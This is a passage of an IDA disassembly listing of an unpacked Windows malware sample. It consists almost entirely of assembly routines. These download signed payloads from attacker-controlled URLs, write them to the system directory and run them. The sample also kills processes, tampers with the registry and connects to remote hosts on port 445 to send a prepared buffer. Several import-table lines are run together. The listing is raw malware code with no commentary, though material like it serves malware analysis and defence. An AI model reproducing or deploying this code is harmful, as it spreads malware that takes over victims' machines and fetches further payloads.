;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 68378933513B4455D2BFBA5F42EC2046
; File Name : u:\work\68378933513b4455d2bfba5f42ec2046_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; InterlockedExchange
push 0
push offset dword_31424FEC
call ebx ; InterlockedExchange
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
